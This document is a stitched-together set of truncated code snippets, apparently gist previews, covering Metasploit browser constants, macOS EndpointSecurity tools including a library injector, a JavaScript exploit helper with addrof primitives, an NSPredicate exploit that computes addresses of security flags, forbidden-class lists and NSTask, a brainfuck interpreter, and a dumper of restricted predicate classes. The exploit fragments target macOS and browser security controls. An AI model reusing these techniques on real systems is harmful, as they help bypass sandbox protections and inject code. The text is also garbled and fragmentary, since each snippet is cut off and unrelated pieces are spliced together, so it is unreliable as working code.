<script> | |
// Case matters, see lib/msf/core/constants.rb
// All of these should match up with constants in ::Msf::HttpClients
// One declaration list, same identifiers and values as before: each name holds
// the exact user-agent token used to detect that browser family.
var clients_opera  = "Opera",
    clients_ie     = "MSIE",
    clients_ff     = "Firefox",
    clients_chrome = "Chrome",
    clients_safari = "Safari";
// To compile: clang stop_at_entry.c -lbsm -lEndpointSecurity -o stop_at_entry, | |
// then codesign with com.apple.developer.endpoint-security.client and run the | |
// program as root. | |
#include <EndpointSecurity/EndpointSecurity.h> | |
#include <assert.h> | |
#include <bsm/libbsm.h> | |
#include <dispatch/dispatch.h> | |
#include <signal.h> | |
#include <stdbool.h> |
class Helpers { | |
constructor() { | |
this.addrof_LO = new Array(1048577); | |
this.buf = new ArrayBuffer(8); | |
this.f64 = new Float64Array(this.buf); | |
this.f32 = new Float32Array(this.buf); | |
this.u32 = new Uint32Array(this.buf); | |
this.u64 = new BigUint64Array(this.buf); | |
this.state = {}; |
// To compile: clang++ -arch x86_64 -arch arm64 -std=c++20 library_injector.cpp -lbsm -lEndpointSecurity -o library_injector, | |
// then codesign with com.apple.developer.endpoint-security.client and run the | |
// program as root. | |
#include <EndpointSecurity/EndpointSecurity.h> | |
#include <algorithm> | |
#include <array> | |
#include <bsm/libbsm.h> | |
#include <cstddef> | |
#include <cstdint> |
#import <Foundation/Foundation.h> | |
/* | |
[~/predicament]$ gcc -framework Foundation -lobjc -o predicament predicament.m | |
[~/predicament]$ ./predicament "function('','stringByAppendingFormat:','%lld ').longLongValue" | |
Expr: 'FUNCTION("", "stringByAppendingFormat:" , "%lld ").longLongValue' (type: 4) | |
Value: 105553129238592 | |
Danger: 105553129237664 (offset 928) | |
[~/predicament]$ ./predicament "function(function('','stringByAppendingFormat:','%lld ').longLongValue-928,'longValue').dangerous" |
NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging | |
// use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way | |
"$_NSPredicateUtilities := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue," | |
"$_predicateSecurityFlags := $_NSPredicateUtilities + 0x188c," // address of _predicateSecurityFlags | |
"$_predicateSecurityOnce := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce | |
"$forbiddenClassesLength := $_predicateSecurityFlags + 0x63a334," // address of length field for array of forbidden classes | |
"$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4," // address of length field for array of forbidden selectors | |
"$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class | |
"$NSPipe := $NSTask - 0x41a0," // address of NSPipe class |
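// yields brainfuck when quined
// Default program used when no argument is supplied on the command line.
// Declared const: the storage is a string literal, so writing through the
// pointer would be undefined behaviour; the const type makes the compiler
// reject such writes instead of letting them silently corrupt or crash.
const char *h = "++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]"
                ">>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++."; // -> Hello World!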
#import <Foundation/Foundation.h> | |
int main(int argc, char *argv[]) { | |
NSString *program = [NSString stringWithUTF8String: argc > 1 ? argv[1] : h]; | |
NSMutableArray *prog = [NSMutableArray array]; // make the program into an array cuz its easier | |
for (int i = 0; i < program.length; i++) { | |
NSString *c = [program substringWithRange: NSMakeRange(i, 1)]; | |
if ([@".,<>-+[]" rangeOfString: c].location != NSNotFound) [prog addObject: c]; |
// dump classes and selectors forbidden in NSPredicates | |
// `cc -framework Foundation -o restricted restricted.m` | |
#import <Foundation/Foundation.h> | |
#import <dlfcn.h> | |
int main() { | |
void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0); | |
NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses"); | |
NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors"); | |
NSLog(@"Restricted Selectors: %@", RestrictedSelectors()); |